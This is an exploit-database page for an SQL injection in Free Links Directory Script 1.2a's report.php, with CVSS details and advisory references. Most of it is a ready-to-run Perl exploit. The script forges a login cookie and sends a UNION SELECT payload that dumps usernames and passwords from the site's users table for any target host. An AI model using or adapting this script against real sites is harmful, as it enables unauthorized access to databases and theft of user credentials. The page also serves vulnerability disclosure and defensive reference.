FLDS 1.2a report.php (linkida) Remote SQL Injection Exploit

2009.01.04
Credit: ka0x
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w # # Free Links Directory Script V1.2a Remote SQL Injection Exploit # written by ka0x <ka0x01[alt+64]gmail.com> # D.O.M Labs Security Researchers # - www.domlabs.org - # # Vuln code (report.php): # # if($_COOKIE['logged']=="") { # [...] // login # else { # $linkida = $_GET['linkid']; # $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida")) # [...] # use strict; use LWP::UserAgent; my $host = $ARGV[0]; die "[*] usage: perl $0 <host>\n" unless $ARGV[0]; if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ; $ua->timeout(10) ; $ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users"); my $res = $ua->request($req); my $con = $res->content; if ($res->is_success && $con =~ m/____(.*?)____/ms){ print $1; } else { print "[-] exploit failed!\n"; } __END__

References:

http://xforce.iss.net/xforce/xfdb/47377
http://www.securityfocus.com/bid/32859
http://www.milw0rm.com/exploits/7489
http://secunia.com/advisories/33075
http://osvdb.org/50724


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top